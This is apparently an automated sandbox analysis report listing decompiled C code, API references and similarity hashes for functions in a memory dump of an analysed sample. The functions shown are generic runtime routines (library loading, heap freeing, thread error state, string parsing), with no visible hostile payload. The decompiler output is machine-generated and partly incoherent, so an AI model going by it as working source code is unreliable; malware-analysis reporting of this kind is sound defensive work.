Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterFileH_prolog3_LeaveLoadModuleNameType_strlen
String ID:
API String ID: 1175553456-0
Opcode ID: fa427c0a55a37bbd818adbebf8919783f506140aac8893fae1a9dca72ebb4332
Instruction ID: 9f21786f1cacf09d0dfd3930e038e85e90c4f676b7dc9c143131d3a29e0e0256
Opcode Fuzzy Hash: fa427c0a55a37bbd818adbebf8919783f506140aac8893fae1a9dca72ebb4332
Instruction Fuzzy Hash: 1D719471A00619DFDB24DBA5CC85BEDB7B8AF08304F1480A9E645E7291DB75DE84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00CE30D4, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CE30D4(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xe39f20 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xd01ae8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E00CE0F81(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E00CE0F81(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x00ce30dd
0x00ce3187
0x00ce30e5
0x00ce30e7
0x00ce30ee
0x00ce30f0
0x00ce30f6
0x00ce3103
0x00ce3118
0x00ce311c
0x00ce316e
0x00ce316e
0x00ce3173
0x00ce3177
0x00ce317a
0x00ce317a
0x00ce3180
0x00ce3182
0x00ce3199
0x00ce3192
0x00ce3198
0x00ce3198
0x00ce3184
0x00ce3184
0x00000000
0x00ce3184
0x00ce311e
0x00ce3127
0x00ce315e
0x00ce315e
0x00ce3160
0x00ce3162
0x00000000
0x00000000
0x00ce316a
0x00000000
0x00ce316a
0x00ce3131
0x00ce3136
0x00ce313b
0x00000000
0x00000000
0x00ce3145
0x00ce314a
0x00ce314f
0x00000000
0x00000000
0x00ce3154
0x00ce315a
0x00000000
0x00ce315a
0x00ce30fb
0x00000000
0x00000000
0x00000000
0x00ce3101
0x00ce3190
0x00000000

Strings

ext-ms-, xrefs: 00CE313F
api-ms-, xrefs: 00CE312B

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 8460cf5855f8a869d9450df0c99daf74844dbe9b7e0c92468641e28b56d96e4b
Instruction ID: d9c848b2d8b6fadb634b62c4a3df2994a71a99a78ac79f723a3cc26032136ec5
Opcode Fuzzy Hash: 8460cf5855f8a869d9450df0c99daf74844dbe9b7e0c92468641e28b56d96e4b
Instruction Fuzzy Hash: 0021D432E052D5BBCB3147678C48BAE7758AB41760F20021CEC16A7290DA70BF01C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 00CEC87D, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CEC87D(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00CEC54A(_t45, 7);
					E00CEC54A(_t45 + 0x1c, 7);
					E00CEC54A(_t45 + 0x38, 0xc);
					E00CEC54A(_t45 + 0x68, 0xc);
					E00CEC54A(_t45 + 0x98, 2);
					E00CE46CC( *((intOrPtr*)(_t45 + 0xa0)));
					E00CE46CC( *((intOrPtr*)(_t45 + 0xa4)));
					E00CE46CC( *((intOrPtr*)(_t45 + 0xa8)));
					E00CEC54A(_t45 + 0xb4, 7);
					E00CEC54A(_t45 + 0xd0, 7);
					E00CEC54A(_t45 + 0xec, 0xc);
					E00CEC54A(_t45 + 0x11c, 0xc);
					E00CEC54A(_t45 + 0x14c, 2);
					E00CE46CC( *((intOrPtr*)(_t45 + 0x154)));
					E00CE46CC( *((intOrPtr*)(_t45 + 0x158)));
					E00CE46CC( *((intOrPtr*)(_t45 + 0x15c)));
					return E00CE46CC( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00cec883
0x00cec888
0x00cec891
0x00cec89c
0x00cec8a7
0x00cec8b2
0x00cec8c0
0x00cec8cb
0x00cec8d6
0x00cec8e1
0x00cec8ef
0x00cec8fd
0x00cec90e
0x00cec91c
0x00cec92a
0x00cec935
0x00cec940
0x00cec94b
0x00000000
0x00cec95b
0x00cec960

APIs

Part of subcall function 00CEC54A: _free.LIBCMT ref: 00CEC56F

_free.LIBCMT ref: 00CEC8CB

Part of subcall function 00CE46CC: HeapFree.KERNEL32(00000000,00000000,?,00CEC574,?,00000000,?,?,?,00CEC896,?,00000007,?,?,00CECFAC,?), ref: 00CE46E2
Part of subcall function 00CE46CC: GetLastError.KERNEL32(?,?,00CEC574,?,00000000,?,?,?,00CEC896,?,00000007,?,?,00CECFAC,?,?), ref: 00CE46F4

_free.LIBCMT ref: 00CEC8D6
_free.LIBCMT ref: 00CEC8E1
_free.LIBCMT ref: 00CEC935
_free.LIBCMT ref: 00CEC940
_free.LIBCMT ref: 00CEC94B
_free.LIBCMT ref: 00CEC956

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8a8240fbfbe089273b610cad4a7f9b0f24ceabf360a2fff8afe0597e8ff59700
Instruction ID: e7fcb56bcb79cc242d5d69be8b70f95a7bac172337dfe6154efbdcad99523bf8
Opcode Fuzzy Hash: 8a8240fbfbe089273b610cad4a7f9b0f24ceabf360a2fff8afe0597e8ff59700
Instruction Fuzzy Hash: BA11BE72501BD4AAD660FBB2CC87FCB7B9CBF01300F400814B69BA6062CA39B515B650

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5D07, Relevance: 9.2, APIs: 6, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00CB5D07(char __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v24;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t52;
				signed int _t54;
				signed int _t70;
				void* _t76;
				intOrPtr* _t79;
				intOrPtr* _t80;
				signed int _t82;
				intOrPtr* _t83;
				signed int _t84;
				intOrPtr* _t88;
				signed int _t93;
				intOrPtr* _t94;
				intOrPtr* _t96;
				intOrPtr* _t100;
				void* _t104;
				intOrPtr _t106;
				signed int _t107;
				void* _t109;

				_t109 = (_t107 & 0xfffffff8) - 0x2c;
				_v36 = __ecx;
				if(__ecx == 0) {
					L31:
					_t52 = 0x80070057;
					L32:
					return _t52;
				}
				_t79 = _a4;
				if(_t79 == 0 || _a8 == 0 || _a12 == 0) {
					goto L31;
				} else {
					_v24 = 0xe00;
					_push(0);
					_push(4);
					_push( &_v24);
					_push(__ecx);
					_t52 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0x10))();
					_t104 = _t52;
					if(_t104 < 0) {
						goto L32;
					}
					_t54 = 0;
					_v60 = 0;
					_v44 = 0;
					_v56 = 0;
					if( *((intOrPtr*)(_t79 + 4)) == 0) {
						L28:
						_t82 = _v60;
						__eflags = _t82;
						if(_t82 != 0) {
							 *((intOrPtr*)( *_t82 + 8))(_t82);
						}
						_t52 = _t104;
						goto L32;
					}
					_t100 = _t79;
					_t80 = __imp__#9;
					_t83 = _t100;
					L7:
					while(1) {
						if( *_t100 == 0) {
							L24:
							_t54 = _t54 + 1;
							_v56 = _t54;
							_t100 = _t54 * 0x24 + _t83;
							if( *((intOrPtr*)(_t100 + 4)) == 0) {
								goto L28;
							}
							continue;
						}
						if( *((intOrPtr*)(_t100 + 0x1c)) == 0) {
							E00CC1E00(_t100,  &_v36, 0, 0x10);
							_t109 = _t109 + 0xc;
							__imp__#8( &_v36);
							_t84 =  *(_t100 + 8);
							__eflags = _t84 - _v48;
							if(_t84 == _v48) {
								L20:
								__eflags = E00CB16DF(_v64,  *((intOrPtr*)(_t100 + 0x14)),  &_v40);
								if(__eflags < 0) {
									L27:
									_t104 = 0x80004005;
									 *_t80( &_v40);
									goto L28;
								}
								_t104 = E00CB19F7(_t80,  &_v40, _t100, __eflags);
								 *_t80( &_v48, _v56,  *(_t100 + 0x20) & 0x0000ffff);
								L22:
								if(_t104 < 0) {
									goto L28;
								}
								_t54 = _v72;
								_t83 = _a4;
								goto L24;
							}
							_t93 = _v64;
							__eflags = _t93;
							if(_t93 != 0) {
								_t29 =  &_v64;
								 *_t29 = _v64 & 0x00000000;
								__eflags =  *_t29;
								 *((intOrPtr*)( *_t93 + 8))(_t93);
								_t84 =  *(_t100 + 8);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								 *_t80( &_v40);
								_t104 = 0x80004005;
								goto L28;
							} else {
								_t94 = _a12;
								_t70 =  *((intOrPtr*)( *_t94))(_t94, _t84,  &_v64);
								__eflags = _t70;
								if(_t70 < 0) {
									goto L27;
								}
								_v60 =  *(_t100 + 8);
								goto L20;
							}
						}
						_t96 =  *((intOrPtr*)(_t100 + 0x18)) + _a8;
						if( *(_t100 + 0x20) != 8) {
							_t88 = _v52;
							_t104 =  *((intOrPtr*)( *_t88 + 0x10))(_t88, _t96,  *((intOrPtr*)(_t100 + 0x1c)), 0);
						} else {
							_v48 = _v48 & 0x00000000;
							_t106 =  *_t96;
							if(_t106 != 0) {
								__imp__#6(0);
								_v52 = _t106;
							}
							_t76 = E00CB1803( &_v48, _v52);
							_t104 = _t76;
							__imp__#6(0);
						}
						goto L22;
					}
				}
			}

0x00cb5d0d
0x00cb5d10
0x00cb5d19
0x00cb5ebc
0x00cb5ebc
0x00cb5ec1
0x00cb5ec7
0x00cb5ec7
0x00cb5d1f
0x00cb5d24
0x00000000
0x00cb5d3e
0x00cb5d46
0x00cb5d4e
0x00cb5d4f
0x00cb5d51
0x00cb5d52
0x00cb5d53
0x00cb5d56
0x00cb5d5a
0x00000000
0x00000000
0x00cb5d60
0x00cb5d62
0x00cb5d66
0x00cb5d6a
0x00cb5d71
0x00cb5eaa
0x00cb5eaa
0x00cb5eae
0x00cb5eb0
0x00cb5eb5
0x00cb5eb5
0x00cb5eb8
0x00000000
0x00cb5eb8
0x00cb5d77
0x00cb5d79
0x00cb5d7f
0x00000000
0x00cb5d81
0x00cb5d84
0x00cb5e7b
0x00cb5e7b
0x00cb5e7f
0x00cb5e83
0x00cb5e89
0x00000000
0x00000000
0x00000000
0x00cb5e8b
0x00cb5d8e
0x00cb5df0
0x00cb5df5
0x00cb5dfd
0x00cb5e03
0x00cb5e06
0x00cb5e0a
0x00cb5e3f
0x00cb5e51
0x00cb5e53
0x00cb5e9e
0x00cb5ea2
0x00cb5ea8
0x00000000
0x00cb5ea8
0x00cb5e67
0x00cb5e6e
0x00cb5e70
0x00cb5e72
0x00000000
0x00000000
0x00cb5e74
0x00cb5e78
0x00000000
0x00cb5e78
0x00cb5e0c
0x00cb5e10
0x00cb5e12
0x00cb5e14
0x00cb5e14
0x00cb5e14
0x00cb5e1c
0x00cb5e1f
0x00cb5e1f
0x00cb5e22
0x00cb5e24
0x00cb5e95
0x00cb5e97
0x00000000
0x00cb5e26
0x00cb5e26
0x00cb5e32
0x00cb5e34
0x00cb5e36
0x00000000
0x00000000
0x00cb5e3b
0x00000000
0x00cb5e3b
0x00cb5e24
0x00cb5d93
0x00cb5d9b
0x00cb5dd0
0x00cb5de0
0x00cb5d9d
0x00cb5d9d
0x00cb5da2
0x00cb5da6
0x00cb5daa
0x00cb5db0
0x00cb5db0
0x00cb5dbc
0x00cb5dc3
0x00cb5dc5
0x00cb5dc5
0x00000000
0x00cb5d9b
0x00cb5d81

APIs

SysFreeString.OLEAUT32(00000000), ref: 00CB5DAA
SysFreeString.OLEAUT32(00000000), ref: 00CB5DC5
VariantClear.OLEAUT32(?), ref: 00CB5E95
VariantClear.OLEAUT32(?), ref: 00CB5EA8

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearFreeStringVariant
String ID:
API String ID: 1438600931-0
Opcode ID: cc37cf416dcd903d8b34009255c40f49e19852a5c78510b7931f53fe0028315d
Instruction ID: b0802e5461baa48b4a243b5fc76cceb6ba42efce149b00bdf0135929b1b74f21
Opcode Fuzzy Hash: cc37cf416dcd903d8b34009255c40f49e19852a5c78510b7931f53fe0028315d
Instruction Fuzzy Hash: 4C51BD716047429FC714CF65C888BAAB7E9FF88714F044A1DF8559B290D778EE84CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CE5916, Relevance: 9.1, APIs: 6, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CE5916(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xd0f060; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00CE358C(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00CE3C3D(_t43, 1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00CE358C(__eflags,  *0xd0f060, _t51);
							if(__eflags != 0) {
								E00CE5588(_t60, _t51, 0xe3a01c);
								E00CE46CC(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00CE358C(__eflags,  *0xd0f060, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00CE358C(0,  *0xd0f060, 0);
							_push(0);
							L9:
							E00CE46CC();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00CE354D(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xd0f060; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00CE0F3D(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0xd0f060; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00CE358C(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00CE3C3D(_t43, 1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00CE358C(__eflags,  *0xd0f060, _t60);
								if(__eflags != 0) {
									E00CE5588(_t60, _t60, 0xe3a01c);
									E00CE46CC(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00CE358C(__eflags,  *0xd0f060, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00CE358C(__eflags,  *0xd0f060, _t20);
								_push(_t60);
								L25:
								E00CE46CC();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00CE354D(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xd0f060; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00CE0F3D(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xd0f060; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00CE358C(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00CE3C3D(_t43, 1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00CE358C(__eflags,  *0xd0f060, _t54);
											if(__eflags != 0) {
												E00CE5588(_t61, _t54, 0xe3a01c);
												E00CE46CC(0);
												goto L45;
											} else {
												_t40 = 0;
												E00CE358C(__eflags,  *0xd0f060, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00CE358C(0,  *0xd0f060, 0);
											_push(0);
											L41:
											E00CE46CC();
											goto L36;
										}
									}
								} else {
									_t54 = E00CE354D(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xd0f060; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x00ce5916
0x00ce5916
0x00ce5921
0x00ce5923
0x00ce5928
0x00ce592b
0x00ce5949
0x00ce594c
0x00ce5951
0x00ce5953
0x00000000
0x00ce5955
0x00ce5961
0x00ce5964
0x00ce5965
0x00ce5967
0x00ce598c
0x00ce598e
0x00ce59a7
0x00ce59ae
0x00ce59b3
0x00000000
0x00ce5990
0x00ce5990
0x00ce5999
0x00ce599e
0x00000000
0x00ce599e
0x00ce5969
0x00ce5969
0x00ce5969
0x00ce5972
0x00ce5977
0x00ce5978
0x00ce5978
0x00ce597d
0x00000000
0x00ce597d
0x00ce5967
0x00ce592d
0x00ce5933
0x00ce5937
0x00ce5944
0x00000000
0x00ce5939
0x00ce593c
0x00ce59b6
0x00ce59b6
0x00ce593e
0x00ce593e
0x00ce593e
0x00ce5940
0x00ce5940
0x00ce5940
0x00ce593c
0x00ce5937
0x00ce59b9
0x00ce59c1
0x00ce59c3
0x00ce59c5
0x00ce59cd
0x00ce59d2
0x00ce59d3
0x00ce59d8
0x00ce59d9
0x00ce59dc
0x00ce59f6
0x00ce59f9
0x00ce59fe
0x00ce5a00
0x00000000
0x00ce5a02
0x00ce5a0e
0x00ce5a11
0x00ce5a12
0x00ce5a14
0x00ce5a37
0x00ce5a39
0x00ce5a50
0x00ce5a57
0x00ce5a5c
0x00000000
0x00ce5a3b
0x00ce5a42
0x00ce5a47
0x00000000
0x00ce5a47
0x00ce5a16
0x00ce5a1d
0x00ce5a22
0x00ce5a23
0x00ce5a23
0x00ce5a28
0x00000000
0x00ce5a28
0x00ce5a14
0x00ce59de
0x00ce59e4
0x00ce59e6
0x00ce59e8
0x00ce59f1
0x00000000
0x00ce59ea
0x00ce59ea
0x00ce59ed
0x00ce5a67
0x00ce5a67
0x00ce5a6c
0x00ce5a6f
0x00ce5a70
0x00ce5a71
0x00ce5a78
0x00ce5a7a
0x00ce5a7f
0x00ce5a82
0x00ce5aa0
0x00ce5aa3
0x00ce5aa8
0x00ce5aaa
0x00000000
0x00ce5aac
0x00ce5ab8
0x00ce5abc
0x00ce5abe
0x00ce5ae3
0x00ce5ae5
0x00ce5afe
0x00ce5b05
0x00000000
0x00ce5ae7
0x00ce5ae7
0x00ce5af0
0x00ce5af5
0x00000000
0x00ce5af5
0x00ce5ac0
0x00ce5ac0
0x00ce5ac0
0x00ce5ac9
0x00ce5ace
0x00ce5acf
0x00ce5acf
0x00000000
0x00ce5ad4
0x00ce5abe
0x00ce5a84
0x00ce5a8a
0x00ce5a8c
0x00ce5a8e
0x00ce5a9b
0x00000000
0x00ce5a90
0x00ce5a90
0x00ce5a93
0x00ce5b0d
0x00ce5b0d
0x00ce5a95
0x00ce5a95
0x00ce5a95
0x00ce5a95
0x00ce5a97
0x00ce5a97
0x00ce5a97
0x00ce5a93
0x00ce5a8e
0x00ce5b10
0x00ce5b18
0x00ce5b1a
0x00ce5b1a
0x00ce5b21
0x00ce59ef
0x00ce5a5f
0x00ce5a5f
0x00ce5a61
0x00000000
0x00ce5a63
0x00ce5a66
0x00ce5a66
0x00ce5a61
0x00ce59ed
0x00ce59e8
0x00ce59c7
0x00ce59cc
0x00ce59cc

APIs

GetLastError.KERNEL32(?,?,?,00CCF2AE,?,?,?,?,00CE6FA3,?), ref: 00CE591B
_free.LIBCMT ref: 00CE5978
_free.LIBCMT ref: 00CE59AE
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00CE6FA3,?), ref: 00CE59B9
_free.LIBCMT ref: 00CE5A23
_free.LIBCMT ref: 00CE5A57

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 890cf1194353964ce9f3a71c865cbfa76e9447c1ef19d935ad7f0e5a3982cef4
Instruction ID: fde201109e0e4be9d4acea124b024424faeaff342068cf3d6c6b06476f700750
Opcode Fuzzy Hash: 890cf1194353964ce9f3a71c865cbfa76e9447c1ef19d935ad7f0e5a3982cef4
Instruction Fuzzy Hash: 0931D432545BD1AAD62133776C8BB7B25499B41778B380338F934E73E3DA64CE01BA60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB1A6F, Relevance: 9.1, APIs: 6, Instructions: 115COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CB1A76

Memory Dump Source

Source File: 00000000.00000002.374494025.0000000000CB1000.00000020.00020000.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.374489140.0000000000CB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374529106.0000000000CFE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.374539587.0000000000D0F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374544614.0000000000D10000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374666156.0000000000E38000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.374671965.0000000000E39000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.374677848.0000000000E3B000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 6ea14521b682b321a15717e120fcbcd0b4f4e0574582eb934c0cc7398f1e4827
Instruction ID: 486070d8a29e0ea3c49f1082e3cec59624e45957c1fcabeea4db0c2cc36cbdf5
Opcode Fuzzy Hash: 6ea14521b682b321a15717e120fcbcd0b4f4e0574582eb934c0cc7398f1e4827
Instruction Fuzzy Hash: 7D41B4B1600214AFCB10CF65C898FEA7B78EF44710F688159FD16DB190EB70EA41D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB314F, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00CB314F(CHAR** __ecx, char* _a4) {
				intOrPtr _v8;
				void* _t14;
				void* _t15;
				CHAR* _t16;
				CHAR* _t18;
				CHAR* _t25;
				CHAR* _t27;
				char _t29;
				intOrPtr _t31;
				void* _t34;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t43;
				intOrPtr _t46;
				char* _t49;
				CHAR** _t51;

				_push(__ecx);
				_t51 = __ecx;
				E00CB3129(__ecx);
				_t25 =  *__ecx;
				_t29 =  *_t25;
				if(_t29 == 0) {
					L24:
					_t14 = 0x80020009;
				} else {
					_t49 = _a4;
					_a4 = _t49;
					if(_t29 != 0x27) {
						L13:
						L13:
						if(_t29 < 9) {
							_t15 = 0;
						} else {
							_t15 = E00CB3113(_t29);
						}
						if(_t15 != 0) {
							goto L22;
						}
						_t16 = CharNextA(_t25);
						 *_t51 = _t16;
						_t31 = _t16 - _t25;
						_v8 = _t31;
						_t9 = _t31 + 1; // 0x1
						if(_t9 + _t49 >= _a4 + 0x1000) {
							goto L24;
						} else {
							_t43 = _v8;
							_t34 = 0;
							if(_t43 > 0) {
								do {
									 *_t49 = _t25[_t34];
									_t49 = _t49 + 1;
									_t34 = _t34 + 1;
								} while (_t34 < _t43);
								_t16 =  *_t51;
							}
							_t29 =  *_t16;
							_t25 = _t16;
							if(_t29 != 0) {
								goto L13;
							} else {
								goto L22;
							}
						}
						goto L25;
						L22:
						 *_t49 = 0;
						goto L23;
					} else {
						_t18 = CharNextA(_t25);
						 *_t51 = _t18;
						while( *_t18 != 0) {
							if(E00CB297C(_t51) != 0) {
								break;
							} else {
								_t27 =  *_t51;
								if( *_t27 == 0x27) {
									_t27 = CharNextA(_t27);
									 *_t51 = _t27;
								}
								_t18 = CharNextA(_t27);
								 *_t51 = _t18;
								_t37 = _t18 - _t27;
								_v8 = _t37;
								_t4 = _t37 + 1; // 0x1
								if(_t4 + _t49 >= _a4 + 0x1000) {
									goto L24;
								} else {
									_t46 = _v8;
									_t40 = 0;
									if(_t46 > 0) {
										do {
											 *_t49 = _t27[_t40];
											_t49 = _t49 + 1;
											_t40 = _t40 + 1;
										} while (_t40 < _t46);
										_t18 =  *_t51;
									}
									continue;
								}
							}
							goto L25;
						}
						if( *( *_t51) == 0) {
							goto L24;
						} else {
							 *_t49 = 0;
							 *_t51 = CharNextA( *_t51);
							L23:
							_t14 = 0;
						}
					}
				}
				L25:
				return _t14;
			}

